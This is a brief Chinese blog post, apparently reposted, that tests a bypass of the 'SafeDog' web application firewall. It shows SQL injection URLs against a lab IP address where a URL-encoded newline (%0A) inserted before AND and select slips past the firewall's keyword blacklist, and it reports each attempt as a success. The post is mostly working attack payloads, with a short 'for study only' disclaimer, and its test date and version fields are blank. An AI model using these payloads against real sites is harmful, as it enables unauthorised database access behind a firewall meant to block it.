网站安全狗最新版绕过测试

信息安全 4165 Views

测试时间:测试版本:,均为今天能下到的最新版。

测试详细步骤:

http://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user

AND作为关键字被识别并拦截。

2、加入http://192.168.91.152/cart.aspx?act=buy&id=1%0AAND 1=user

成功绕过并实现注入。

先按常规进行注入尝试:

http://192.168.91.152:8000/About.php?did=2 and/**/(select user())=”

因为均为黑名单里的关键字。那么我们加入%0A再次尝试:

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=”

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=’%0A%0A成功绕过,毫无压力 。

此方法仅供学习研究,切勿用于非法用途。若需转载,请保留版权((点击“阅读原文”可以进行评论或浏览更多文章喔,还可直接回复订阅号,告诉妹子你的看法( ̄▽ ̄)~*

如未说明则本站原创,转载请注明出处:NULL » 网站安全狗最新版绕过测试